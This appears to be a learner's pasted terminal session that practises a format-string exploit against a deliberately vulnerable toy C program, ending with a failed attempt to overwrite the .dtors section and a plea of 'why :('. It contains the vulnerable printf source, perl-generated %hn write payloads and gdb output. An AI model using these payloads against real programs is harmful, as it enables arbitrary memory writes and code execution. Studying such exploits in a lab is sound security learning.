daan@ubuntu:~/hax/fmt$ export SC=`cat sc`daan@ubuntu:~/hax/fmt$ ./env SCSC i

1. daan@ubuntu:~/hax/fmt$ export SC=`cat sc`
2. daan@ubuntu:~/hax/fmt$ ./env SC
3. SC is located at 0xbffffdf5
4.  
5.  
6. daan@ubuntu:~/hax/fmt$ cat vuln.c
7. #include <stdlib.h>
8. #include <stdio.h>
9. #include <string.h>
10.  
11. int main(int argc, char *argv[]) {
12. static int canary = 0;
13. char temp[2048];
14.  
15. strcpy(temp, argv[1]);
16. printf(temp);
17. printf("\n");
18. printf("Canary at 0x%08x = 0x%08x\n", &canary, canary);
19. }
20.  
21. PROOF OF CONCEPT:
22.  
23. ./vln `perl -e 'print "\x26\xa0\x04\x08\x24\xa0\x04\x08"'`%.49143x%3\$hn%.15862x%4\$hn
24. [snip]
25. Canary at 0x0804a024 = 0xbffffdf5
26.  
27.  
28. daan@ubuntu:~/hax/fmt$ nm vln | grep DTOR
29. 08049f20 D __DTOR_END__
30. 08049f1c d __DTOR_LIST__
31.  
32.  
33. USE 0x08049f20:
34.  
35. daan@ubuntu:~/hax/fmt$ gdb -q vln
36. (gdb) break main
37. Breakpoint 1 at 0x804844d
38. (gdb) run `perl -e 'print "\x22\x9f\x04\x08\x20\x9f\x04\x20"'`%.49143x%3\$hn%.15862x%4\$hn
39.  
40. Breakpoint 1, 0x0804844d in main ()
41. (gdb) n
42. Single stepping until exit from function main,
43. which has no line number information.
44. "�
45. Canary at 0x0804a024 = 0x00000000
46. 0xb7e65113 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
47.  
48. (gdb) x/2x 0x08049f1c
49. 0x8049f1c <__DTOR_LIST__>: 0xffffffff 0x00000000
50.  
51.  
52. why :(